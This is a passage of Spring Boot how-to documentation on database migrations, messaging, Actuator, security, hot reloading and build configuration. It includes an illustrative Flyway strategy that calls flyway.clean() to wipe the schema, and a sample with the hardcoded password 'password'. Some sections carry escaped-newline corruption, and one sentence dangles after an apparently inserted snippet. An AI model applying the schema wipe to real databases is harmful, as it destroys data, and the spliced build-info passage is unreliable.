The migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an
underscore-separated version, e.g. '`1`' or '`2_1`'). By default they live in a folder
`classpath:db/migration` but you can modify that using `flyway.locations`. You can also
add a special `{vendor}` placeholder to use vendor-specific scripts. Assume the following:

[source,properties,indent=0]
----
	flyway.locations=db/migration/{vendor}
----

Rather than using `db/migration`, this configuration will set the folder to use according
to the type of the database (i.e. `db/migration/mysql` for MySQL). The list of supported
databases is available in {sc-spring-boot}/jdbc/DatabaseDriver.{sc-ext}[`DatabaseDriver`].

See also the Flyway class from flyway-core for details of available settings like schemas
etc.
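Spring Boot will call `Flyway.migrate()` to perform the database migration. If you would
like more control, provide a `@Bean` that implements
{sc-spring-boot-autoconfigure}/flyway/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].
As a rough sketch, a strategy that wipes the schema before migrating might look as follows
(the clean-before-migrate behaviour is purely illustrative and destructive, so not
something you would want in production):

[source,java,indent=0]
----
	@Bean
	public FlywayMigrationStrategy cleanMigrateStrategy() {
		return new FlywayMigrationStrategy() {

			@Override
			public void migrate(Flyway flyway) {
				// drop all objects in the configured schemas, then migrate from scratch
				flyway.clean();
				flyway.migrate();
			}

		};
	}
----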
In addition, Spring Boot provides a small set of properties in
{sc-spring-boot-autoconfigure}/flyway/FlywayProperties.{sc-ext}[`FlywayProperties`]
that can be used to disable the migrations, or switch off the location checking.

TIP: If you want to make use of http://flywaydb.org/documentation/callbacks.html[Flyway
callbacks], those scripts should also live in the `classpath:db/migration` folder.

By default Flyway will autowire the (`@Primary`) `DataSource` in your context and
use that for migrations. If you would like to use a different `DataSource` you can create
one and mark its `@Bean` as `@FlywayDataSource` - if you do that remember to create
another one and mark it as `@Primary` if you want two data sources.
Or you can use Flyway's native `DataSource` by setting `flyway.[url,user,password]`
in external properties.

There is a {github-code}/spring-boot-samples/spring-boot-sample-flyway[Flyway sample] so
you can see how to set things up.

You can also use Flyway to provide data for specific scenarios. For example, you can
place test-specific migrations in `src/test/resources` and they will only be run when your
application starts for testing. If you want to be more sophisticated you can use
profile-specific configuration to customize `flyway.locations` so that certain migrations
will only run when a particular profile is active. For example, in
`application-dev.properties` you could set `flyway.locations` to
`classpath:/db/migration, classpath:/dev/db/migration` and migrations in `dev/db/migration`
will only run when the `dev` profile is active.



[[howto-execute-liquibase-database-migrations-on-startup]]
==== Execute Liquibase database migrations on startup
To automatically run Liquibase database migrations on startup, add
`org.liquibase:liquibase-core` to your classpath.

The master change log is by default read from `db/changelog/db.changelog-master.yaml` but
can be set using `liquibase.change-log`. In addition to YAML, Liquibase also supports
JSON, XML, and SQL change log formats.

By default Liquibase will autowire the (`@Primary`) `DataSource` in your context and use
that for migrations. If you would like to use a different `DataSource` you can create one
and mark its `@Bean` as `@LiquibaseDataSource` - if you do that remember to create another
one and mark it as `@Primary` if you want two data sources. Or you can use Liquibase's
native `DataSource` by setting `liquibase.[url,user,password]` in external properties.

See
{sc-spring-boot-autoconfigure}/liquibase/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]
for details of available settings like contexts, default schema etc.

There is a {github-code}/spring-boot-samples/spring-boot-sample-liquibase[Liquibase sample]
so you can see how to set things up.



[[howto-messaging]]
== Messaging



[[howto-jms-disable-transaction]]
=== Disable transacted JMS session
If your JMS broker does not support transacted sessions, you will have to disable
transaction support altogether. If you create your own `JmsListenerContainerFactory`
there is nothing to do since it won't be transacted by default.
If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted session as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThis overrides the default factory and this should be applied to any other factory that\nyour application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch applications\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you'll need to implement `BatchConfigurer`, see\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch jobs on startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (comma-separated job name patterns).\n\nIf the application context includes a `JobRegistry` then the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP port or address of the actuator endpoints\nIn a standalone application the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port set the external property\n`management.port`. To listen on a completely different network address (e.g. 
if you have
an internal network for management and an external one for user applications) you can
also set `management.address` to a valid IP address that the server is able to bind to.

For more detail look at the
{sc-spring-boot-actuator}/autoconfigure/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]
source code and
_<<production-ready-features.adoc#production-ready-customizing-management-server-port>>_
in the '`Production-ready features`' section.



[[howto-customize-the-whitelabel-error-page]]
=== Customize the '`whitelabel`' error page
Spring Boot installs a '`whitelabel`' error page that you will see in a browser client if
you encounter a server error (machine clients consuming JSON and other media types should
see a sensible response with the right error code).

NOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off,
which will restore the default of the servlet container that you are using. Note that
Spring Boot will still attempt to resolve the error view, so you'd probably want to add
your own error page rather than disabling it completely.

Overriding the error page with your own depends on the templating technology that you are
using. For example, if you are using Thymeleaf you would add an `error.html` template and
if you are using FreeMarker you would add an `error.ftl` template. In general what you
need is a `View` that resolves with a name of `error`, and/or a `@Controller` that handles
the `/error` path. Unless you replaced some of the default configuration you should find
a `BeanNameViewResolver` in your `ApplicationContext` so a `@Bean` with id `error` would
be a simple way of doing that. Look at
{sc-spring-boot-autoconfigure}/web/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`] for more options.

See also the section on <<boot-features-error-handling, Error Handling>> for details of
how to register handlers in the servlet container.



[[howto-sanitize-sensible-values]]
=== Sanitize sensitive values
Information returned by the `env` and `configprops` endpoints can be somewhat sensitive
so keys matching a certain pattern are sanitized by default (i.e. their values are
replaced by `******`).

Spring Boot uses sensible defaults for such keys: for instance, any key ending with the
word "password", "secret", "key" or "token" is sanitized. It is also possible to use a
regular expression instead, such as `.*credentials.*`, to sanitize any key that holds the
word `credentials` as part of the key.

The patterns to use can be customized using the `endpoints.env.keys-to-sanitize` and
`endpoints.configprops.keys-to-sanitize` properties respectively.



[[howto-use-actuator-with-jersey]]
=== Actuator and Jersey
Actuator HTTP endpoints are only available for Spring MVC-based applications. If you want
to use Jersey and still use the actuator you will need to enable Spring MVC (by depending
on `spring-boot-starter-web`, for example). By default, both Jersey and the Spring MVC
dispatcher servlet are mapped to the same path (`/`). You will need to change the path for
one of them (by configuring `server.servlet-path` for Spring MVC or
`spring.jersey.application-path` for Jersey).
For example, if you add\n`server.servlet-path=\/system` into `application.properties`, the actuator HTTP endpoints\nwill be available under `\/system`.\n\n\n\n[[howto-security]]\n== Security\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot security configuration\nIf you define a `@Configuration` with `@EnableWebSecurity` anywhere in your application\nit will switch off the default webapp security settings in Spring Boot (but leave the\nActuator's security enabled). To tweak the defaults try setting properties in\n`+security.*+` (see\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\nfor details of available settings) and `SECURITY` section of\n<<common-application-properties-security,Common application properties>>.\n\n\n\n[[howto-change-the-authenticationmanager-and-add-user-accounts]]\n=== Change the AuthenticationManager and add user accounts\nIf you provide a `@Bean` of type `AuthenticationManager` the default one will not be\ncreated, so you have the full feature set of Spring Security available (e.g.\nhttp:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various authentication options]).\n\nSpring Security also provides a convenient `AuthenticationManagerBuilder` which can be\nused to build an `AuthenticationManager` with common options. The recommended way to\nuse this in a webapp is to inject it into a void method in a\n`WebSecurityConfigurerAdapter`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SecurityConfiguration extends WebSecurityConfigurerAdapter {\n\n\t\t@Autowired\n\t\tpublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\t\t\tauth.inMemoryAuthentication()\n\t\t\t\t\t.withUser(\"barry\").password(\"password\").roles(\"USER\"); \/\/ ... etc.\n\t\t}\n\n\t\t\/\/ ... other stuff for application security\n\n\t}\n----\n\nYou will get the best results if you put this in a nested class, or a standalone class\n(i.e. not mixed in with a lot of other `@Beans` that might be allowed to influence the\norder of instantiation). The {github-code}\/spring-boot-samples\/spring-boot-sample-web-secure[secure web sample]\nis a useful template to follow.\n\nIf you experience instantiation issues (e.g. using JDBC or JPA for the user detail store)\nit might be worth extracting the `AuthenticationManagerBuilder` callback into a\n`GlobalAuthenticationConfigurerAdapter` (in the `init()` method so it happens before the\nauthentication manager is needed elsewhere), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class AuthenticationManagerConfiguration extends\n\t\t\tGlobalAuthenticationConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void init(AuthenticationManagerBuilder auth) {\n\t\t\tauth.inMemoryAuthentication() \/\/ ... etc.\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS when running behind a proxy server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you are using Tomcat as a servlet container, then\nSpring Boot will add Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). 
The standard behavior is determined by the presence or absence of
certain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are
conventional, so it should work with most front-end proxies. You can switch on the valve
by adding some entries to `application.properties`, e.g.

[source,properties,indent=0]
----
	server.tomcat.remote-ip-header=x-forwarded-for
	server.tomcat.protocol-header=x-forwarded-proto
----

(The presence of either of those properties will switch on the valve. Or you can add the
`RemoteIpValve` yourself by adding a `TomcatEmbeddedServletContainerFactory` bean.)

Spring Security can also be configured to require a secure channel for all (or some)
requests. To switch that on in a Spring Boot application you just need to set
`security.require_ssl` to `true` in `application.properties`.



[[howto-hotswapping]]
== Hot swapping



[[howto-reload-static-content]]
=== Reload static content
There are several options for hot reloading. The recommended approach is to use
<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>> as it provides
additional development-time features such as support for fast application restarts
and LiveReload as well as sensible development-time configuration (e.g. template caching).
Devtools works by monitoring the classpath for changes. This means that static resource
changes must be "built" for the change to take effect. By default, this happens
automatically in Eclipse when you save your changes. In IntelliJ IDEA, Make Project will
trigger the necessary build. Due to the
<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart
exclusions>>, changes to static resources will not trigger a restart of your application.
They will, however, trigger a live reload.

Alternatively, running in an IDE (especially with debugging on) is a good way to do
development (all modern IDEs allow reloading of static resources and usually also
hot-swapping of Java class changes).

Finally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can
be configured (see the `addResources` property) to support running from the command line
with reloading of static files directly from source. You can use that with an external
css/js compiler process if you are writing that code with higher-level tools.



[[howto-reload-thymeleaf-template-content]]
=== Reload templates without restarting the container
Most of the templating technologies supported by Spring Boot include a configuration
option to disable caching (see below for details). If you're using the
`spring-boot-devtools` module these properties will be
<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>
for you at development time.



[[howto-reload-thymeleaf-content]]
==== Thymeleaf templates
If you are using Thymeleaf, then set `spring.thymeleaf.cache` to `false`. See
{sc-spring-boot-autoconfigure}/thymeleaf/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]
for other Thymeleaf customization options.



[[howto-reload-freemarker-content]]
==== FreeMarker templates
If you are using FreeMarker, then set `spring.freemarker.cache` to `false`.
See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy templates\nIf you are using Groovy templates, then set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast application restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhilst not as fast as technologies such as http:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel]\nor https:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] it's usually\nsignificantly faster than a \"`cold start`\". You should probably give it a try before\ninvestigating some of the more complex reload options discussed below.\n\nFor more details see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java classes without restarting the container\nModern IDEs (Eclipse, IDEA, etc.) all support hot swapping of bytecode, so if you make a\nchange that doesn't affect class or method signatures it should reload cleanly with no\nside effects.\n\nhttps:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] goes a little further in\nthat it can reload class definitions with changes in the method signatures. With some\ncustomization it can force an `ApplicationContext` to refresh itself (but there is no\ngeneral mechanism to ensure that would be safe for a running application anyway, so it\nwould only ever be a development time trick probably).\n\n\n[[howto-reload-springloaded-maven]]\n==== Configuring Spring Loaded for use with Maven\nTo use Spring Loaded with the Maven command line, just add it as a dependency in the\nSpring Boot plugin declaration, e.g.\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework<\/groupId>\n\t\t\t\t<artifactId>springloaded<\/artifactId>\n\t\t\t\t<version>1.2.6.RELEASE<\/version>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/plugin>\n----\n\nThis normally works pretty well with Eclipse and IntelliJ IDEA as long as they have their\nbuild configuration aligned with the Maven defaults (Eclipse m2e does this out of the\nbox).\n\n\n\n[[howto-reload-springloaded-gradle-and-intellij-idea]]\n==== Configuring Spring Loaded for use with Gradle and IntelliJ IDEA\nYou need to jump through a few hoops if you want to use Spring Loaded in combination with\nGradle and IntelliJ IDEA. 
By default, IntelliJ IDEA will compile classes into a different
location than Gradle, causing Spring Loaded monitoring to fail.

To configure IntelliJ IDEA correctly you can use the `idea` Gradle plugin:

[source,groovy,indent=0,subs="verbatim,attributes"]
----
	buildscript {
		repositories { jcenter() }
		dependencies {
			classpath "org.springframework.boot:spring-boot-gradle-plugin:{spring-boot-version}"
			classpath 'org.springframework:springloaded:1.2.6.RELEASE'
		}
	}

	apply plugin: 'idea'

	idea {
		module {
			inheritOutputDirs = false
			outputDir = file("$buildDir/classes/main/")
		}
	}

	// ...

----

NOTE: IntelliJ IDEA must be configured to use the same Java version as the command line
Gradle task and `springloaded` *must* be included as a `buildscript` dependency.

You can also additionally enable '`Make Project Automatically`' inside IntelliJ IDEA to
automatically compile your code whenever a file is saved.



[[howto-build]]
== Build



[[howto-build-info]]
=== Generate build information
Both the Maven and Gradle plugins allow you to generate build information containing
the coordinates, name and version of the project. The plugins can also be configured
to add additional properties through configuration. When the generated build-info file
is present, Spring Boot auto-configures a `BuildProperties` bean.

To generate build information with Maven, add an execution for the `build-info` goal:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
				<version>{spring-boot-version}</version>
				<executions>
					<execution>
						<goals>
							<goal>build-info</goal>
						</goals>
					</execution>
				</executions>
			</plugin>
		</plugins>
	</build>
----

TIP: Check the {spring-boot-maven-plugin-site}/[Spring Boot Maven Plugin documentation]
for more details.

And to do the same with Gradle:

[source,groovy,indent=0,subs="verbatim,attributes"]
----
	springBoot {
		buildInfo()
	}
----

Additional properties can be added using the DSL:

[source,groovy,indent=0,subs="verbatim,attributes"]
----
	springBoot {
		buildInfo {
			additionalProperties = [
				'foo': 'bar'
			]
		}
	}
----



[[howto-git-info]]
=== Generate git information

Both Maven and Gradle allow you to generate a `git.properties` file containing information
about the state of your `git` source code repository when the project was built.

For Maven users the `spring-boot-starter-parent` POM includes a pre-configured plugin to
generate a `git.properties` file. Simply add the following declaration to your POM:

[source,xml,indent=0]
----
	<build>
		<plugins>
			<plugin>
				<groupId>pl.project13.maven</groupId>
				<artifactId>git-commit-id-plugin</artifactId>
			</plugin>
		</plugins>
	</build>
----

Gradle users can achieve the same result using the
https://plugins.gradle.org/plugin/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin:

[source,groovy,indent=0]
----
	plugins {
		id "com.gorylenko.gradle-git-properties" version "1.4.17"
	}
----
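When the generated build and git information files are present, Spring Boot should expose
`BuildProperties` and `GitProperties` beans (both from the `org.springframework.boot.info`
package) that can be injected like any other bean. A minimal sketch (the `BuildInfoLogger`
class and the logged format are purely illustrative):

[source,java,indent=0]
----
	@Component
	public class BuildInfoLogger {

		private final BuildProperties build;

		private final GitProperties git;

		public BuildInfoLogger(BuildProperties build, GitProperties git) {
			this.build = build;
			this.git = git;
		}

		@PostConstruct
		public void logBuildInfo() {
			// prints something like "my-app 1.0.2 (abc1234)"
			System.out.println(build.getName() + " " + build.getVersion()
					+ " (" + git.getShortCommitId() + ")");
		}

	}
----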
This is the default format for both plugins listed above. Using this format\nallows the time to be parsed into a `Date` and its format when serialized to JSON to be controlled by\nJackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions-with-maven]]\n[[howto-customize-dependency-versions]]\n=== Customize dependency versions\nIf you use a Maven build that inherits directly or indirectly from `spring-boot-dependencies`\n(for instance `spring-boot-starter-parent`) but you want to override a specific\nthird-party dependency you can add appropriate `<properties>` elements. Browse\nthe {github-code}\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version\nyou would add the following:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<\/slf4j.version>\n\t<\/properties>\n----\n\nNOTE: This only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>` you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against a specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, you can specify a version as shown below:\n\n[source,groovy,indent=0]\n----\n\text['slf4j.version'] = '1.7.5'\n----\n\nFor additional information, please refer to the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[Gradle Dependency\nManagement Plugin documentation].\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable '`fat`' JAR. If you\nare using the `spring-boot-starter-parent` POM you can simply declare the plugin and\nyour jars will be repackaged:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you are not using the parent POM you can still use the plugin; however, you must\nadditionally add an `<executions>` section:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot application as a dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module.
The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, the following configuration can be used:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd when using Gradle, the following configuration can be used:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRepackage {\n\t\tclassifier = 'exec'\n\t}\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract specific libraries when an executable jar runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run;\nhowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked to the '`temp folder`' when the executable jar first runs.\n\nFor example, to indicate that JRuby should be flagged for unpack using the Maven Plugin\nyou would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd to do the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\trequiresUnpack = ['org.jruby:jruby-complete']\n\t}\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a non-executable JAR with exclusions\nOften if you have an executable and a non-executable jar as build products, the executable\nversion will have additional configuration files that are not needed in a library jar.\nE.g.
the `application.yml` configuration file might be excluded from the non-executable JAR.\n\nHere's how to do that in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>exec<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<!-- Need this to ensure application.yml is excluded -->\n\t\t\t\t\t\t\t<forceCreation>true<\/forceCreation>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIn Gradle you can create a new JAR archive with standard task DSL features, and then have\nthe `bootRepackage` task depend on that one using its `withJarTask` property:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tjar {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\texcludes = ['**\/application.yml']\n\t}\n\n\ttask('execJar', type:Jar, dependsOn: 'jar') {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\tclassifier = 'exec'\n\t\tfrom sourceSets.main.output\n\t}\n\n\tbootRepackage {\n\t\twithJarTask = tasks['execJar']\n\t}\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote debug a Spring Boot application started with Maven\nTo attach a remote debugger to a Spring Boot application started with Maven you can use\nthe `jvmArguments` property of the {spring-boot-maven-plugin-site}\/[maven plugin].\n\nCheck {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more details.\n\n\n\n[[howto-remote-debug-gradle-run]]\n=== Remote debug a Spring Boot application started with Gradle\nTo attach a remote debugger to a Spring Boot application started with Gradle you can use\nthe `jvmArgs` property of the `bootRun` task or the `--debug-jvm` command line option.\n\n`build.gradle`:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRun {\n\t\tjvmArgs \"-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005\"\n\t}\n----\n\n\nCommand line:\n\n[indent=0]\n----\n\t$ gradle bootRun --debug-jvm\n----\n\n\nCheck {gradle-userguide}\/application_plugin.html[Gradle Application Plugin] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an executable archive from Ant without using spring-boot-antlib\nTo build with Ant you need to grab dependencies, compile and then create a jar or war\narchive. To make it executable you can either use the `spring-boot-antlib`\nmodule, or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n `BOOT-INF\/classes` directory.
If you are building a war, package the application's\n classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n `WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\n directory for jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\n entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so the `Main-Class`\n is available).\n. Use the appropriate launcher, e.g. `JarLauncher` for a jar file, as a `Main-Class`\n attribute in the manifest and specify the other properties it needs as manifest entries,\n principally a `Start-Class`.\n\nExample:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" 